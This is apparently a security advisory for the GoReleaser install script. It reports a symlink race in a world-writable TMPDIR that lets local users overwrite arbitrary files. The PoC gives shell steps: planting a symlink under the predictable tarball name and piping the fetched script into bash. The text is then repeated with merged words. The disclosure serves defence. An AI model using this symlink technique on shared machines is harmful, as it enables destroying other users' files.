Summary
Short summary of the problem. Make the impact and severity as clear as possible. For example: An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the server.
The goreleaser.com/static/run script allows local users to overwrite arbitrary files to which the user running the script has write access to.
Detail,
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
This vulnerability is enabled when the TMPDIR environment variable is set and non-empty, and pointing to a directory having unrestrictive permissions, such as when/if it is set to the system temporary directory, which is typically world writable.
By placing a symlink having the predictable filename in such a directory the run script ends up downloading, any local user can cause overwriting any file to which the user running the vulnerable script has write access to.
PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
On a Linux x86_64 system:
$ export TMPDIR=/tmp
$ echo "Hello, world." >"$TMPDIR/canary.txt"
$ ln -s canary.txt "$TMPDIR/goreleaser_Linux_x86_64.tar.gz" # to be done as some other user
$ curl -sfL https://goreleaser.com/static/run | bash # per https://goreleaser.com/install/#bash-script
Using the OSS distribution...
Downloading GoReleaser v1.18.2...
Verifying checksums...
Could not verify signatures, cosign is not installed.
• starting release...
• could not find a config file, using defaults...
• loading environment variablesgoreleaser_Linux_x86_64.tar.gz
⨯ release failed after 0s error=missing GITHUB_TOKEN, GITLAB_TOKEN and GITEA_TOKEN
$ stat --printf="%s\n" "$TMPDIR/canary.txt"
16905476
$ sha256sum "$TMPDIR/canary.txt"
811e0c63e347f78f3c8612a19ca8eeb564eb45f0265ce3f38aec39c8fdbcfa10 /tmp/canary.txt
# matches sha256sum of goreleaser_Linux_x86_64.tar.gz from the 1.18.2 release
Impact
What kind of vulnerability is it? Who is impacted?
Arbitrary file overwrite, anyone running the said script in an environment where the TMPDIR env var points to a dir with unrestrictive permissions.
Summary
Short summary of the problem. Make the impact and severity as clear as possible. For example: An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the server.
The goreleaser.com/static/run script allows local users to overwrite arbitrary files to which the user running the script has write access to.
Detail,
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
This vulnerability is enabled when the
TMPDIRenvironment variable is set and non-empty, and pointing to a directory having unrestrictive permissions, such as when/if it is set to the system temporary directory, which is typically world writable.By placing a symlink having the predictable filename in such a directory the
runscript ends up downloading, any local user can cause overwriting any file to which the user running the vulnerable script has write access to.PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
On a Linux x86_64 system:
Impact
What kind of vulnerability is it? Who is impacted?
Arbitrary file overwrite, anyone running the said script in an environment where the
TMPDIRenv var points to a dir with unrestrictive permissions.